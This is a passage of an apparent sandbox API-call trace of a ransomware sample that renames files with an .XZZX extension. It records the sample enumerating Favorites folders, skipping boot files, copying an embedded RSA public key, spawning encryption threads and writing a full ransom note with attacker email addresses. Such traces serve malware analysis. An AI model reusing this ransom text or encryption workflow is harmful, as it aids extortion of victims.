LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.001] lstrcpyW (in: lpString1=0x17be7c, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0237.001] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0237.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x121c [0237.001] Sleep (dwMilliseconds=0x96) [0237.156] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.157] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2="..") returned 1 [0237.157] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2=".") returned 1 [0237.157] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.157] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntldr") returned 0x0 [0237.157] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTLDR") returned 0x0 [0237.157] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.157] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0237.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0237.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0237.157] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.157] lstrcpyW (in: lpString1=0x17be7c, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0237.157] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0237.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x91c [0237.157] Sleep (dwMilliseconds=0x96) [0237.312] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.312] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0237.312] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0237.313] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0237.313] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0237.313] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0237.313] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0237.313] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0237.313] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0237.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0237.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0237.313] SetErrorMode (uMode=0x1) returned 0x1 [0237.313] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 67 [0237.313] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0237.314] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0237.314] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x920) returned 0x0 [0237.314] RegQueryValueExW (in: hKey=0x920, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dbd20, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43dbd20*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0237.314] RegCloseKey (hKey=0x920) returned 0x0 [0237.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0237.314] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0237.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x920 [0237.314] CloseHandle (hObject=0x920) returned 1 [0237.314] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0237.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0237.314] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0237.315] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0237.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0237.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0237.315] SetErrorMode (uMode=0x1) returned 0x1 [0237.315] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0237.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.315] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0237.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0237.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0237.315] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0237.315] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.315] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntldr") returned 0x0 [0237.315] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTLDR") returned 0x0 [0237.315] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.315] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.315] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0237.315] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0237.315] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0237.316] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.316] lstrcpyW (in: lpString1=0x17be7c, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0237.316] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1220 [0237.316] Sleep (dwMilliseconds=0x96) [0237.468] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.468] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2="..") returned 1 [0237.468] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2=".") returned 1 [0237.469] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.469] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntldr") returned 0x0 [0237.469] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTLDR") returned 0x0 [0237.469] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.469] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.469] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0237.469] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0237.469] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0237.469] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.469] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0237.469] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1224 [0237.469] Sleep (dwMilliseconds=0x96) [0237.624] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.624] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2="..") returned 1 [0237.624] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2=".") returned 1 [0237.625] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.625] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntldr") returned 0x0 [0237.625] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTLDR") returned 0x0 [0237.625] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.625] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.625] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0237.625] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0237.625] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0237.625] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.625] lstrcpyW (in: lpString1=0x17be7c, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0237.625] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1228 [0237.625] Sleep (dwMilliseconds=0x96) [0237.781] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.781] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2="..") returned 1 [0237.781] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2=".") returned 1 [0237.781] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.781] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntldr") returned 0x0 [0237.781] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTLDR") returned 0x0 [0237.781] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.781] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.781] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0237.781] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0237.781] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0237.781] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.781] lstrcpyW (in: lpString1=0x17be7c, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0237.781] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x122c [0237.781] WaitForSingleObject (hHandle=0x122c, dwMilliseconds=0xffffffff) returned 0x0 [0237.783] Sleep (dwMilliseconds=0x96) [0237.936] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.936] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2="..") returned 1 [0237.936] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2=".") returned 1 [0237.936] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.937] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntldr") returned 0x0 [0237.937] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", 